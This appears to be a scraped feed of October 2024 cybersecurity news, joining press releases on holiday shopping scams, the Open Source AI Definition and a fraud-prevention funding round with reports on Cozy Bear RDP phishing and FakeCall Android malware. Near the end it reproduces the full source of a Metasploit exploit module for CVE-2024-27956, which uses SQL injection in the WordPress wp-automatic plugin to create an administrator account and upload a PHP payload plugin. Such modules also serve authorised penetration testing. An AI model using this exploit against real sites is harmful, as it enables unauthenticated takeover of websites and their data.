PRESS RELEASE

TEMPE, Ariz. and PRAGUE, Oct. 29, 2024 /PRNewswire/ -- Holiday shopping is in full swing, with over 60% of Americans ready to click "add to cart" for most of their purchases this holiday season. But it's not just shoppers gearing up – scammers are, too. Nearly half (48%) of U.S. consumers report being targeted by a scam while holiday shopping online, according to the 2024 Norton Cyber Safety Insights Report: Holiday. Additionally, more than half (53%) of Americans are worried about Black Friday and Cyber Monday shopping scams. Norton, a consumer Cyber Safety brand of Gen (NASDAQ: GEN), encourages people to take time on Cyber Safety Sunday, December 1st, to prepare to safely shop online this holiday season and bolster their defenses against cybercriminals and scammers.

'Tis the Season for Shopping and Scamming

Cyber Safety Sunday is observed the Sunday after Thanksgiving and is a day for shoppers to take proactive steps to prioritize their online safety ahead of shopping Cyber Week deals, booking holiday travel, and more. Nearly half of Americans (48%) will do most of their holiday shopping between Black Friday and Cyber Monday – making it not only the busiest time of the year for shoppers – but also scammers. Thirty percent of Americans say they have been targeted by a scam while holiday shopping online. Of the two fifths (43%) who fell victim, 30% report the scam happened on Black Friday, 11% on Cyber Monday and 30% on Christmas.

"The holidays can be a hectic time, and when we are busy or looking for ways to save money, sometimes we let our guard down," said Leyla Bilge for Norton. "This Cyber Safety Sunday, we encourage everyone to take a few simple steps that will go a long way to help you stay safe online this season. Stick to sites you trust, stay educated on common scams, update passwords, set fraud alerts and always think twice before sharing your personal information. Give yourself the gift of peace of mind knowing you're prepared."

Rising Concerns Over Cyber Grinches 

Of the 90% of Americans buying gifts to spread holiday cheer, 60% will be clicking "add to cart" for most of their presents this season. While online shopping is fun and convenient, the rise in online crime has made shoppers feel less merry and more wary about their online safety. In fact, 62% are concerned about becoming victims of cybercrime this season, with 47% specifically worried about falling for a sophisticated holiday shopping scam. A look deeper into Norton's data reveals concerns rising from last year:

*   71% of US consumers are concerned about their personal details being compromised, up 8% YoY. 
    
*   59% are concerned about being scammed by a 3rd party retailer, up 9% YoY. 
    
*   59% are concerned about AI shopping scams, up 11% YoY. 
    

Decking the Halls with Discounts 

With the costs of many goods on the rise, everyone's looking to stretch their holiday budgets a little further, resulting in 87% of U.S. online shoppers spending extra time to look for discount codes. However, it is important to be aware of the information you offer to gain access to these deals, as it can lead to significant privacy risks.  When you enter personal details, such as your name, email or payment information to redeem a discount code, that data could fall into the wrong hands if the website is not secure. Some scammers also create fake promotions or clone legitimate retailer websites to trick consumers into submitting their information, which they can then use for identity theft, financial fraud or to sell on the dark web.

Norton discovered that two thirds (67%) of people have taken some action to receive a discount code. Of these deal seekers, 57% signed up for a mailing list, 39% answered a survey and 30% liked a post or posted on social media. Nearly two-thirds (65%) of people were willing to give personal information including their email (91%), phone number (52%) or home address (35%).

It's no coincidence that while shoppers are keen for discounts, malvertising and adware are the cyber threats that increase the most dramatically during the holiday season. During last year's holiday shopping season, Gen data reveals a 53% increase in malvertising attacks – malicious ads often seen by consumers when searching for something such as sales. Adware – malicious software often distributed via malvertising – increased by 227% over the same period.

To stay safe, try to find codes directly from the retailer and not third-party providers. Consider using an alternative email address that you don't typically use for daily, personal life. Products such as Norton AntiTrack can create these emails for you in a single click. Think twice: Is the discount worth potentially compromising your digital safety or identity?

Enlisting AI Holiday Helpers 

Both retailers and consumers are using AI tools to help ease the stress of holiday shopping. Nearly a quarter of people (23%) have interacted with an AI chatbot or assistant and 43% have noticed AI-enhanced search results with personal recommendations while shopping.

While 36% of Americans say that AI recommendations are helpful and could enhance their online shopping experience, most shoppers are still resistant to AI. Fifty-seven percent of people say they would abandon their carts if they could only speak with a chatbot rather than a real customer service representative. Only 26% of shoppers trust AI to handle their personal information securely, and 37% who have interacted with an AI chatbot while holiday shopping online report receiving inaccurate information.

Sleighing Suspicious Social Media Ads 

Despite general distrust in social media sites, shoppers continue to click on social ads to purchase holiday gifts. Thirty-seven percent of Americans have purchased a holiday gift from a social ad, with these buyers mainly purchasing through Facebook (60%), Instagram (48%) and TikTok (40%).

Clicking on social media ads can expose people to unnecessary risks such as phishing attacks, malware infections and privacy breaches. Fraudulent ads may lead to fake websites that steal personal information or payment details, and some may download harmful or malicious software onto your device. Despite these risks, 20% of people are still willing to click on a social media ad or email claiming to offer a gift—reminding us all that some "holiday deals" belong on the naughty list.

This Cyber Safety Sunday, take control of your Cyber Safety by using AI to spot scams. Norton Genie is an AI-powered app that provides a fast, easy and free way to check if a message, like an email offering a holiday discount, is a scam. Genie can also review social media links and other suspicious web links, such as those that direct people to track deliveries for holiday gifts, offer gift cards or steer people to fake third-party websites and confirm whether the information or offer is malicious.

Visit Norton.com this Cyber Safety Sunday and throughout the holidays to learn how you can prepare for a safe shopping season and find out about the top scams and more holiday shopping insights in the 2024 Norton Cyber Safety Insights Report: Holiday.

About the 2024 Norton Cyber Safety Insights Report: Holiday 

The study was conducted online within the United States by Dynata on behalf of Gen from August 30th to September 11th, 2024 among 1,000 adults ages 18 and older. Data is weighted where necessary by age, gender and region, to be nationally representative. 

About Norton

Norton is a leader in Cyber Safety, and part of Gen™ (NASDAQ: GEN), a global company dedicated to powering Digital Freedom with a family of trusted consumer brands. Norton empowers millions of individuals and families with award-winning protection for their devices, online privacy, and identity. Norton products and services are certified by independent testing organizations including AV-TEST, AV-Comparatives, and SE Labs. Norton is a founding member of the Coalition Against Stalkerware. Learn more at https://us.norton.com/.

Norton Report Reveals Nearly Half of US Consumers Were Targeted by a Scam While Online Shopping

PRESS RELEASE

RALEIGH, N.C., Oct. 28, 2024 /PRNewswire-PRWeb/ -- ALL THINGS OPEN 2024 -- After a year-long, global, community design process, the Open Source Definition (OSAID) v.1.0 is available for public use.

The release of version 1.0 was announced today at All Things Open 2024, an industry conference focused on common issues of interest to the worldwide Open Source community. The OSAID offers a standard by which community-led, open and public evaluations will be conducted to validate whether or not an AI system can be deemed Open Source AI. This first stable version of the OSAID is the result of multiple years of research and collaboration, an international roadshow of workshops, and a year-long co-design process led by the Open Source Initiative (OSI), globally recognized by individuals, companies and public institutions as the authority that defines Open Source.

"The co-design process that led to version 1.0 of the Open Source AI Definition was well-developed, thorough, inclusive and fair," said Carlo Piana, OSI board chair. "It adhered to the principles laid out by the board, and the OSI leadership and staff followed our directives faithfully. The board is confident that the process has resulted in a definition that meets the standards of Open Source as defined in the Open Source Definition and the Four Essential Freedoms, and we're energized about how this definition positions OSI to facilitate meaningful and practical Open Source guidance for the entire industry."

"The new definition requires Open Source models to provide enough information about their training data so that a 'skilled person can recreate a substantially equivalent system using the same or similar data,' which goes further than what many proprietary or ostensibly Open Source models do today," said Ayah Bdeir, who leads AI strategy at Mozilla. "This is the starting point to addressing the complexities of how AI training data should be treated, acknowledging the challenges of sharing full datasets while working to make open datasets a more commonplace part of the AI ecosystem. This view of AI training data in Open Source AI may not be a perfect place to be, but insisting on an ideologically pristine kind of gold standard that will not actually be met by any model builder could end up backfiring."

"We welcome OSI's stewardship of the complex process of defining Open Source AI," said Liv Marte Nordhaug, CEO of the Digital Public Goods Alliance (DPGA) secretariat. "The Digital Public Goods Alliance secretariat will build on this foundational work as we update the DPG Standard as it relates to AI as a category of DPGs."

"Transparency is at the core of EleutherAI's non-profit mission. The Open Source AI Definition is a necessary step towards promoting the benefits of Open Source principles in the field of AI," said Stella Biderman, executive director at the EleutherAI Institute. "We believe that this definition supports the needs of independent machine learning researchers and promotes greater transparency among the largest AI developers."

"Arriving at today's OSAID version 1.0 was a difficult journey, filled with new challenges for the OSI community," said OSI Executive Director, Stefano Maffulli. "Despite this delicate process, filled with differing opinions and uncharted technical frontiers—and the occasional heated exchange—the results are aligned with the expectations set out at the start of this two-year process. This is a starting point for a continued effort to engage with the communities to improve the definition over time as we develop with the broader Open Source community the knowledge to read and apply OSAID v.1.0."

The text of the OSAID v.1.0 as well as a partial list of the many global stakeholders who endorse the definition can be found here:

https://opensource.org/ai

About the Open Source Initiative   
Founded in 1998, the Open Source Initiative (OSI) is a non-profit corporation with global scope formed to educate about and advocate for the benefits of Open Source and to build bridges among different constituencies in the Open Source community. It is the steward of the Open Source Definition and the Open Source AI Definition, setting the foundation for the global Open Source ecosystem. Join and support the OSI mission today at https://opensource.org/join.

The Open Source Initiative Announces Open Source AI Definition

PRESS RELEASE

NEW YORK, Oct. 28, 2024 /PRNewswire/ -- Casap, a disputes automation and fraud prevention platform, has raised $8.5 million to scale the first AI-powered solution for banks, credit unions and fintechs to intelligently tackle first-party fraud and automate disputes and chargebacks. The recent round was led by Lightspeed Venture Partners with participation from Primary Venture Partners, Commerce Ventures, Curql, Alloy Labs, and notable fintech founders and execs from Chime, Robinhood, Square, Current, Novo, and Alloy. The funding will enable Casap to continue to scale its AI decisioning, helping financial institutions reduce operational costs, curb fraud-related losses, and transform the consumer experience.

"The surge in first-party fraud and dispute volumes are overwhelming financial institutions," said Shanthi Shanmugam, co-founder and CEO of Casap. "Our platform helps banks, credit unions and fintechs meet these challenges head-on with intelligent automation that delivers fast, frictionless dispute resolution at a fraction of today's cost. By empowering institutions to identify fraudulent claims early and resolve legitimate cases swiftly, Casap is transforming what is often a frustrating customer service experience into an opportunity to build consumer loyalty."

Financial institutions are under immense pressure to resolve the 238 million chargebacks that emerge annually, most of which take 45-90 days to resolve. First-party fraud has consistently risen year over year since COVID, with more consumers disputing legitimate charges to avoid payment. This surge, combined with a growing tendency to file disputes directly with payment providers instead of merchants, has led to overwhelming volumes and substantial financial losses. Institutions are forced to hire large teams, navigate complex regulations, and outsource chargebacks yet still struggle to meet consumer expectations — 50% of consumers will switch banks if they are not getting the service they want and expect, leading to long-term attrition and escalating costs.

Casap's AI-powered automations and proprietary "first-party fraud score", similar to an industry-standard FICO score, combine to resolve a dispute end-to-end without human intervention. The platform intelligently analyzes evidence, predicts outcomes, and automates key actions — such as issuing credits, filing chargebacks, and responding to merchants — while using its fraud score to identify suspicious consumers and merchants to proactively reduce disputes.

"Our team was impressed by the deep expertise Shanthi and Saisi brought to what is a cross-industry problem with significant scale. The company's early momentum is a promising indication of the type of compounding technological innovation we look for," says Aaron Frank, Partner at Lightspeed.

Casap's chargeback model, the first of its kind, includes publicly available weights — putting Casap at the forefront of innovation and sets a new standard for transparency in the industry. With built-in regulatory expertise and key integrations, Casap's advanced AI and decisioning capabilities cut resolution times from days to minutes, driving significant cost savings and enhancing operational efficiency for financial institutions.

Casap is already delivering measurable results for customers across the payments ecosystem, from major fintechs and established institutions like Chartway Credit Union to Banking-as-a-Service providers and sponsor banks.

"Before Casap, our team lacked the tools to effectively resolve disputes or file chargebacks, leading to a negative member experience and limited ability to improve the process," said Karin Collier, Director of Card Services at Chartway Credit Union. "Partnering with Casap has revolutionized how we think about disputes. With Casap's built-in regulatory expertise and AI-powered automation, we get to drive fast, accurate dispute outcomes, catch friendly fraud early, achieve higher NPS, all while seeing an immediate positive impact on our bottom line. Casap's customizability helps us adapt quickly to evolving needs, fraud trends, and transforms the way we work across the credit union. With Casap, AI is more than a tool—it's the engine driving our mission to create an unparalleled member experience. We're excited to continue partnering with Casap to transform how we operate across the back-office and set a new benchmark for exceptional member service."

"Choosing Casap as our multi-year partner for disputes and fraud management was an easy decision," continues Collier. "The partnership delivers immediate impact, with 29% cost savings from day one with even greater efficiencies projected just a month out. More importantly, Casap enables us to build trust by offering our members a fast, seamless self-service experience that sets a new standard for dispute resolution."

Casap is committed to making its platform the best-in-class solution for resolving disputes and chargebacks, helping customers achieve results up to four times faster than competitors in the space.

"Consumer trust is the lifeblood of financial institutions," Shanmugam continues. "Casap gives banks, credit unions and fintechs the tools they need to resolve genuine disputes quickly, while curbing the rising costs of fraud. We're not just solving a back-office problem—we're reshaping how institutions build trust and loyalty in the face of fraud."

Before founding Casap, Shanthi Shanmugam and Saisi Peter spent years driving innovation at fintech powerhouses Chime and Robinhood, with a focus on delivering seamless, consumer-first experiences. Their expertise in revolutionizing the way we operate payments has fueled Casap's rapid growth and early momentum.

Casap has also been recognized by industry leaders, winning the NACUSO 2024 Next Big Idea Competition.

About

Casap is an AI-powered disputes automation and fraud prevention platform. With built-in regulatory expertise and network integrations, Casap's intelligent automation identifies fraudulent claims early and delivers fast, frictionless dispute and chargeback resolution at a fraction of today's cost. Growing financial institutions use Casap to scale with a triple shield — back office efficiencies, fraud protection, and consumer delight. Casap is backed by top-tier VCs and notable fintech founders. Learn more at casaphq.com.

Casap Secures $8.5M in Funding

Russian state-sponsored hackers Cozy Bear are targeting over 100 organizations globally with a new phishing campaign. This sophisticated…

Russian state-sponsored hackers Cozy Bear are targeting over 100 organizations globally with a new phishing campaign. This sophisticated attack uses signed RDP files disguised as legitimate documents to gain remote access and steal sensitive data. Learn how to protect yourself and your organization from this threat.

Microsoft has revealed that the Russian state-sponsored threat actor Cozy Bear (or APT29, UNC2452, and Midnight Blizzard) has launched a new phishing campaign targeting over 100 organizations worldwide, especially Ukraine, the United States and Europe.

The campaign, active since October 22, 2024, involves highly targeted emails designed to trick users into opening malicious files, ultimately granting the attackers access to sensitive information.

The attackers are mainly focusing on organizations in critical sectors such as government, defence, academia, and non-governmental organizations. This aligns with Cozy Bear’s previous pattern of targeting entities holding valuable intelligence.

****What’s new this time?****

Cozy Bear is using a never-before-seen approach involving signed Remote Desktop Protocol (RDP) configuration files. These apparently harmless files are sent as attachments in phishing emails, often disguised with lures related to Microsoft, Amazon Web Services (AWS), and the concept of Zero Trust. The emails are composed with sophistication, even impersonating Microsoft employees to enhance their credibility.

****How does it work?****

According to Microsoft’s blog post shared with Hackread.com ahead of publishing, when a user opens the malicious RDP file, a connection is established to a server controlled by Cozy Bear.

This connection grants the attackers access to a wide range of resources on the victim’s device, including files, connected peripherals, clipboard data, and even authentication features. This access can be exploited to install malware, steal sensitive data, and maintain persistent access even after the RDP session is closed.

****What’s at risk?****

The potential consequences of a successful attack are significant. Cozy Bear could gain access to confidential government information, intellectual property, and sensitive data belonging to various organizations. The compromised devices could also be used as launchpads for further attacks, potentially spreading the infection to other connected systems.

Patrick Harr, CEO of Pleasanton, Calif.-based SlashNext Email Security+, commented on the recent developments, warning organizations about the increasing sophistication of phishing attacks.

_“_This attack once again highlights that phishing continues to be the most dangerous threat to your organization which is why companies must not only continuously train their users, they must also employ AI detection and phishing sandboxes for malicious links and files directly in their email, collaboration and messaging apps,_“_ Patrick advised.

_“_These new sophisticated attacks, many of them AI-generated, evade current secure email gateways (SEGs) and even Microsoft Defender for Office. The only way organizations can defend themselves is by using AI to prevent these attacks before successful breaches._“_

Microsoft, along with CERT-UA and Amazon, has confirmed the ongoing campaign and is working to notify affected customers. Cybersecurity experts urge organizations and individuals to be alert, especially when dealing with emails containing attachments or requests for remote access.

Additionally, enabling multi-factor authentication, using phishing-resistant authentication methods, and educating users about these phishing techniques are important steps in mitigating this attack.

1.  TeamViewer Confirms Breach by Midnight Blizzard
2.  Midnight Blizzard Hacked UK Home Office via Microsoft
3.  Midnight Blizzard Hackers Hit MS Teams in Precision Attack
4.  Iranian Hackers Hit Microsoft 365 Users with MFA Push Bombing
5.  Russian Malware Attack Hits Ukrainian Military Recruits via Telegram

Russian Cozy Bear Hackers Phish Critical Sectors with Microsoft, AWS Lures

A new variant of the sophisticated attacker tool gives cybercriminals even more control over victim devices to conduct various malicious activities, including fraud and cyber espionage.

Source: Brian Jackson via Alamy Stock Photo

A new variant of a sophisticated malware that helps attackers carry out advanced voice and mobile phishing (aka vishing and mishing) attacks against Android users has evolved with new capabilities that extend their control over compromised devices to commit further malicious activities.

FakeCall, a malware that's been tracked by various research groups since at least 2022, conducts the attacks by tricking victims into calling fraudulent phone numbers controlled by the attacker, and then impersonating a typical conversation with bank employees or other entities aimed at defrauding the user in some way.

FakeCall's capability historically lies inherently in its design for communicating with an attacker-controlled command-and-control (C2) server, enabling it to execute a range of actions aimed at deceiving the end user. In addition to allowing attackers to control a person's phone calls, it also allows them to gain access to various permissions to Android devices for other malicious activity.  

Researchers at Zimperium zLabs now have discovered a new variant of FakeCall that adds novel capabilities — some of which appear to be under development — that give attackers even more capabilities to monitor people's device activity and control the device with even more precision, they revealed in a blog post published today.

Related:Dark Reading Confidential: Meet the Ransomware Negotiators

The variant demonstrates attackers coming up with new and strategic ways to create a more seamless integration with Android devices, which can help the malware avoid detection and remain active on a user's device without them knowing, the researchers found.

**FakeCall's Extension of Malicious Capabilities**

Specifically, one of the features allows for the malware to integrate with Android's Accessibility Service to give attackers "significant control over the user interface and the ability to capture information displayed on the screen," according to the post.

The feature demonstrates how attackers can evolve past simple device permissions to abuse an even more complex attack vector, "granting attackers near-total control to intercept calls, access sensitive data, and manipulate the user interface," notes Jason Soroko, senior fellow at Sectigo, a provider of certificate life-cycle management (CLM).

By seamlessly mimicking legitimate interfaces, attackers also are making detection by users "nearly impossible," he says, highlighting a critical need for advanced security solutions capable of detecting this threat.

Other new features extend FakeCall's persistent spyware capabilities, which have existed since it was first discovered and set it apart from other vishing and mishing attacks, which tend to be a one-time engagement. One of these is a Bluetooth receiver that acts as a listener to monitor Bluetooth status and changes, while the other is similar, but it acts as a screen receiver to monitor the state of the device's screen.

Related:French ISP Confirms Cyberattack, Data Breach Affecting 19M

**How a FakeCall Attack Works**

FakeCall was first detailed by researchers at Kaspersky in April 2022 as a banking Trojan with extended capability to intercept calls that users make with their banks, to create a fake customer-service experience for malicious purposes.

The malware also had some spyware capabilities, including a feature to turn on a device's microphone and send recordings from it to an attacker's C2 server; the ability to secretly broadcast audio and video from the phone in real time; and the option to pinpoint device location.

A typical FakeCall attack begins when victims download a malicious APK file (masquerading as a legitimate app) onto an Android mobile device through a phishing attack, which acts as a dropper for FakeCall. When launched, the app prompts the user to set it as the default call handler and, once designated, attackers can manage all incoming and outgoing calls. The malware then displays a custom interface mimicking the native Android dialer, seamlessly integrating its malicious functionality.

Related:Delta Launches $500M Lawsuit Against CrowdStrike

While the primary function of FakeCall is to monitor outgoing calls and transmit info to attackers via a C2 server, cyberattackers also can commit other malicious activities using the malware. These include identity fraud, which can be done by exploiting FakeCall's position as the default call handler. The malware can modify the dialed number, replacing it with a malicious one and thus deceiving users into making fraudulent calls.

Attackers also can use FakeCall's adversary-in-the-middle (AitM) approach to hijack incoming and outgoing calls, to make unauthorized connections with other mobile device users. "In this case, users may be unaware until they remove the app or restart their device," according to the post.

**Defending Against FakeCall Attacks**

As vishing and mishing attacks have become a worldwide epidemic that defrauds users of millions of dollars annually — including even the most tech-savvy individuals — it's imperative that people learn to defend themselves from sophisticated versions of these attacks, experts say.

One way to do this is to scrutinize carefully any Android apps being downloaded or used on devices, and to only acquire apps from trusted app stores, Soroko says.

FakeCall is especially dangerous to enterprises given that mobile these days is a primary tool for doing business. This makes compromise of that device potentially "catastrophic," notes Mika Aalto, co-founder and CEO at Hoxhunt, a human risk management platform.

To avoid this scenario, the most important thing that companies can do, Aalto says, is to "equip senior management and employees with the skills and tools to recognize and safely report a mobile phishing attack."

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Vishing, Mishing Go Next-Level With FakeCall Android Malware

Atlanta, Georgia, 30th October 2024, CyberNewsWire

**Atlanta, Georgia, October 30th, 2024, CyberNewsWire**

White House National Cyber Director, CEOs, Key Financial Services Companies, Congressional and Executive Branch Experts will discuss industry priorities for 2025 and beyond  

The American Transaction Processors Coalition (ATPC) Cyber Council will convene “The Tie that Binds: A 21st Century Cybersecurity Dialogue,” on October 31, 2024, at the Bank of America Financial Center Tower’s Convention Hall in Atlanta. This event will feature leading cyber experts from the financial services sector, Federal agencies, the White House, and Congress to focus on pressing cybersecurity issues and ways the financial services sector is addressing these issues. It will include discussions on evolving technologies that will influence the path forward, the role of AI, supply chain security needs, and more. 

> “Cybersecurity is the backbone of the payment processing industry,” said H. West Richards, ATPC executive director. “The work of the ATPC Cyber Council is a testament to our commitment to safeguarding our financial ecosystem and fostering a collaborative approach to tackling the cybersecurity challenges of tomorrow.” 

**Key Speakers and Highlights:** 

*   The Honorable Harry Coker, Jr., White House National Cyber Director, will deliver the luncheon keynote. 
*   The Honorable Rich McCormick (R-GA-06) will deliver a keynote address. 
*   Moira Bergin, Subcommittee on Cybersecurity Staff Director, House Committee on Homeland Security, will discuss legislative priorities and global cybersecurity risks. 
*   The Honorable Andre Dickens, Mayor of Atlanta, will provide a video address. 
*   Barry McCarthy, CEO of Deluxe and Chair of the ATPC Board of Directors, will also deliver a keynote. 
*   Bridgette Walsh, Executive Director of the Financial Services Sector Coordinating Council, and Josh Magri, Founder & CEO of Cyber Risk Institute, will participate in a fireside discussion on private sector best practices. 
*   A panel on AI in financial services will feature Clarissa Banks (Deluxe), David Excell (Featurespace), David King (Mastercard), and Donna Teevens (ACI Worldwide), moderated by Rick Van Luvender. 
*   A panel on cyber education will include Dr. Tony Coulson (CSUSB), Dr. Albena Asenova-Belal (Gwinnett Technical College), Dr. Humayun Zafar (Kennesaw State University), and Dr. Michael Nowatkowski (Augusta University). 
*   H. West Richards, ATPC Executive Director, will open the event with a welcome address. 
*   Rick Van Luvender, ATPC Cyber Council Chair & SVP, Head of Cybersecurity Client Trust & International Cybersecurity Service at Fiserv, will deliver the opening remarks. 
*   Norma Krayem, ATPC Cyber Council Director & Vice President, Chair of the Cybersecurity, Privacy & Digital Innovation Practice Group at Van Scoyoc Associates, will provide insights on future cybersecurity trends.

The forum will conclude with a fireside chat focused on “A Look to the Future: 2025: Top Cybersecurity and Critical Technology Priorities for the ATPC Cyber Council,” featuring Rick Van Luvender from Fiserv and Norma Krayem, the ATPC Cyber Council director, focusing on future cybersecurity and critical technology priorities. 

Conference details are available at https://atpcoalition.com/atpc-cyber-forum/.  

ATPC is a leading voice for America’s payments processors, consisting of the world’s largest, global payment processors, banks, credit card companies and financial services companies. ATPC member companies are uniquely positioned to ensure global payments move seamlessly across the world, while empowering broader and more diverse participation within the financial services system. In the race for a better tomorrow, technology solutions can advance faster than companies can keep up with cybersecurity risks. As a result, the ATPC is one of the few coalitions that created a standalone Cybersecurity Council to prioritize these key cybersecurity issues across its member companies. The ATPC Cyber Council is a unique group made up of only CISOs, CSOs, CIOs and CTOs who are on the front lines every day dealing with the operational impacts of cybersecurity. These U.S. based companies serve hundreds of millions of customer businesses across the globe daily and process hundreds of billions of transactions per year.  

**About the ATPC** 

The ATPC is a leading voice for America’s payments processors, driving awareness of the industry and its value to consumers, businesses, and the economy with legislators and regulators at federal, state, and international levels. The ATPC is rooted in Georgia’s Transaction Alley where electronic payments and the fintech industry began. Yet, our members enable payments in states across the nation and in every corner of the globe. The ATPC has a rich history of economic development, thought leadership, and engagement on legislative and regulatory topics like cybersecurity, privacy, financial inclusion, fraud, as well as emerging themes like open banking, AI, and stable coins. 

**About the ATPC Cyber Council** 

The American Transaction Processors Coalition (ATPC) established a dedicated Cyber Council to galvanize the efforts of the ATPC member companies in addressing cybersecurity risks. The Cyber Council’s mission is to identify best practices and areas of shared risk to help ATPC members address the evolving cyber threat across America’s payments processing system to strengthen industry’s ability to identify, protect, detect, respond to and recover from cyberattacks. 

**Contact**

**Alison Watson**  
**Golin**  
**\[email protected\]**

ATPC Cyber Forum to Focus on Next Generation Cybersecurity and Artificial Intelligence Issues

This Metasploit module exploits an unauthenticated SQL injection vulnerability in the WordPress wp-automatic plugin versions prior to 3.92.1 to achieve remote code execution. The vulnerability allows the attacker to inject and execute arbitrary SQL commands, which can be used to create a malicious administrator account. The password for the new account is hashed using MD5. Once the administrator account is created, the attacker can upload and execute a malicious plugin, leading to full control over the WordPress site.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class SQLExecutionError < RuntimeError; endclass MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Payload::Php  include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Exploit::Remote::HTTP::Wordpress::SQLi  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WordPress wp-automatic Plugin SQLi Admin Creation',        'Description' => %q{          This module exploits an unauthenticated SQL injection vulnerability in the WordPress wp-automatic plugin (versions < 3.92.1)          to achieve remote code execution (RCE). The vulnerability allows the attacker to inject and execute arbitrary SQL commands,          which can be used to create a malicious administrator account. The password for the new account is hashed using MD5.          Once the administrator account is created, the attacker can upload and execute a malicious plugin, leading to full control          over the WordPress site.        },        'Author' => [          'Rafie Muhammad',   # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-27956'],          ['WPVDB', '53a51e79-a216-4ca3-ac2d-57098fd2ebb5'],          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-automatic/automatic-3920-unauthenticated-sql-injection'],          ['URL', 'https://patchstack.com/articles/critical-vulnerabilities-patched-in-wordpress-automatic-plugin/']        ],        'Platform' => %w[php unix linux win],        'Arch' => [ARCH_PHP, ARCH_CMD],        'DisclosureDate' => '2024-03-13',        'DefaultTarget' => 0,        'Privileged' => false,        'Targets' => [          [            'PHP In-Memory',            {              'Platform' => 'php',              'Arch' => ARCH_PHP              # tested with php/meterpreter/reverse_tcp            }          ],          [            'Unix/Linux Command Shell',            {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell',            {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('USERNAME', [false, 'Username to create', Faker::Internet.username]),        OptString.new('PASSWORD', [false, 'Password for the new user', Faker::Internet.password(min_length: 8)]),        OptString.new('EMAIL', [false, 'Email for the new user', Faker::Internet.email])      ]    )  end  def create_sqli_instance    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|      execute_sql_query(payload)    end  end  def execute_sql_query(query)    formatted_query = query.strip.upcase.start_with?('INSERT') ? query : "SELECT (#{query})"    response = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-automatic', 'inc', 'csv.php'),      'method' => 'POST',      'vars_post' => {        'q' => formatted_query,        'auth' => "\0",        'integ' => Rex::Text.md5(formatted_query)      }    })    raise SQLExecutionError, "Failed to execute SQL query: #{query}" unless response    response  end  def upload_and_execute_payload(admin_cookie)    plugin_name = Faker::App.name.gsub(/\s+/, '').downcase    payload_name = Faker::Hacker.noun.gsub(/\s+/, '').downcase    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")    zip = generate_plugin(plugin_name, payload_name)    print_status('Uploading payload...')    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded    print_status("Executing the payload at #{payload_uri}...")    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")    register_dir_for_cleanup("../#{plugin_name}")    send_request_cgi({      'uri' => payload_uri,      'method' => 'GET'    })  end  def exploit    create_sqli_instance    wordpress_sqli_initialize(@sqli)    begin      username = datastore['USERNAME']      password = datastore['PASSWORD']      email = datastore['EMAIL']      wordpress_sqli_create_user(username, password, email)      wordpress_sqli_grant_admin_privileges(username)      admin_cookie = wordpress_login(username, password)      fail_with(Failure::UnexpectedReply, 'Failed to log in to WordPress admin.') unless admin_cookie      upload_and_execute_payload(admin_cookie)    rescue SQLExecutionError => e      fail_with(Failure::UnexpectedReply, e.message)    end  end  def check    return CheckCode::Unknown unless wordpress_and_online?    print_status('Attempting SQLi test to verify vulnerability...')    create_sqli_instance    begin      if @sqli.test_vulnerable        CheckCode::Vulnerable('Target is vulnerable to SQLi!')      else        CheckCode::Safe('Target is not vulnerable or the SQLi test failed.')      end    rescue SQLExecutionError => e      print_error(e.message)      CheckCode::Unknown('Failed to verify SQLi vulnerability due to an error.')    end  endend

WordPress WP-Automatic SQL Injection

A new, more sophisticated variant of the FakeCall malware is targeting Android devices. Learn about the advanced features…

A new, more sophisticated variant of the FakeCall malware is targeting Android devices. Learn about the advanced features that make this malware a serious threat, including screen capturing and remote-control capabilities.

Cybersecurity researchers at Zimperium’s zLabs have identified a “Scary” new variant of the **FakeCall malware**. This malware tricks victims into calling fraudulent phone numbers, leading to identity theft and financial loss. FakeCall is a vishing (**voice phishing**) malware which, once installed, can take almost complete control of a targeted Android phone. 

The latest variant exhibits several new functionalities including the ability to identify, compress, and upload image thumbnails, selectively upload specific images, remotely control the screen, simulate user actions, capture and transmit live video feeds, and remotely unlock the device. These features can capture sensitive documents or personal photos. 

The FakeCall malware typically infiltrates a device through a malicious app downloaded from a compromised website or a phishing email. The app requests permission to become the default call handler. If granted, the malware gains extensive privileges. 

Attack flow (Zimperium)

According to Zimperium’s **blog post** shared with Hackread.com ahead of publishing on Wednesday, attackers are using a service called “The Phone Listener Service” in their attack. In fact, this service is a critical component of the malware, enabling it to manipulate the device’s calling capabilities allowing it to intercept and control all incoming and outgoing and grab sensitive information, such as one-time passwords (**OTP**) or account verification codes.

In addition, the malware can manipulate the device’s display to show fake call interfaces, tricking victims into providing sensitive information. Additionally, it can manipulate call logs to hide its malicious activity and control the duration of calls. These capabilities allow attackers to deceive victims into revealing sensitive information or transferring funds.

Screenshot of the actual fake call interface (Zimperium)

